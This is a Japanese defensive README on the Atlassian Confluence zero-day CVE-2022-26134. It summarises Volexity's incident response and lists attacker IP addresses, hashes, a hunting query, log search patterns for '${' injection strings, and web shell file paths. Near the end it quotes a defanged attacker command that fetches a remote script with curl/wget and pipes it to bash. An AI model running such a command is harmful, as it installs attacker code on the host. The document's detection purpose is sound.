
このリポジトリは、Atlassian Confluenceのゼロデイ悪用について、SecOpsまたはBlue Teamの視点から見た防御と分析の観点で解説しています。
このリポジトリでは、Atlassian Confluence のゼロデイ悪用について、SecOps またはブルーチームの視点からの防御と分析の観点で解説しています。
米国のメモリアルデーウィークエンドに、Volexity は、Atlassian Confluence Server ソフトウェアを実行している 1 顧客が所有する 2 つのインターネット公開 Web サーバーを含むインシデントレスポンス調査を実施しました。この調査は、JSP Web シェルがディスクに書き込まれるなど、ホスト上で不審なアクティビティが検出された後に開始されました。Volexity は直ちに Volexity Surge Collect Pro を使用して、Confluence Server システムからシステムメモリと主要ファイルを収集し、分析を行いました。収集したデータを徹底的にレビューした結果、Volexity は、サーバー侵害が攻撃者がリモートコード実行を達成するためのエクスプロイトを起動したことに起因すると判断できました。その後 Volexity はそのエクスプロイトを再現し、完全に最新の Confluence Server バージョンに影響するゼロデイ脆弱性を特定しました。
この脆弱性の発見と検証に続いて、Volexity は 2022 年 5 月 31 日に Atlassian に連絡し、関連する詳細を報告しました。Atlassian はその後この脆弱性を確認し、この問題に CVE-2022-26134 を割り当てました。現在の Confluence Server および Data Center のバージョンで動作することが確認されています。
技術的な詳細はこちらを参照してください。
154.146.34.145
154.16.105.147
156.146.34.46
156.146.34.52
156.146.34.9
156.146.56.136
198.147.22.148
198.147.22.148
221.178.126.244
45.43.19.91
59.163.248.170
64.64.228.239
66.115.182.102
66.115.182.111
67.149.61.16
98.32.230.38
193.106.191.48
f39b321472b8dac2452e4c0bc687cb5aa401ac6687520fdc9fd523a17477886d
f8df4dd46f02dc86d37d46cf4793e036
DeviceProcessEvents
| where InitiatingProcessFileName has_any( @"tomcat9.exe")
//| where ProcessCommandLine has_any (@"whoami.exe",@"nslookup.exe")
${ を (install directory)/logs/*.log 内で探します。egrep -a -i -f pattern.txt *.log を試します。ここで pattern.txt には ${ を保存するか、単に grep "\${" log file path または grep "$%7B" log file path を試してください。findstr -i noop.jsp "logpath" を試すことができます。confluence_install_dir/work/Standalone/ ディレクトリ内を調べて、$jspname_jsp.java を探してください。たとえば、hack.jsp というシェルが見つかった場合、hack_jsp.java が存在するはずです。hack.jsp がもうディスク上にない場合は、Web ログを遡ってアクセスの痕跡を探してください。それがいつアクセスまたは削除されたかがわかります。process where event='CreateProcess' and parent_process_path='/opt/atlassian/confluence/jre/bin/java' and process_user_name='confluence' は、David が で説明しているように、識別に役立ちます。./admin/findspaceattachments.jsp
./admin/cluster/hashclustername.jsp
./admin/default.jsp
./classpath.jsp
./errors/notfound.jsp
./500page.jsp
./errors.jsp
./noop.jsp
./confluence/org/apache/jsp/ ディレクトリ内に存在すべきでない .java ファイルを探します。java->bash->python->bash のようなプロセスツリーを探してください。bash -c '(curl -s 195.2.79[.]26/cf.sh||wget -q -O- 195.2.79[.]26/cf.sh)|bash を探します。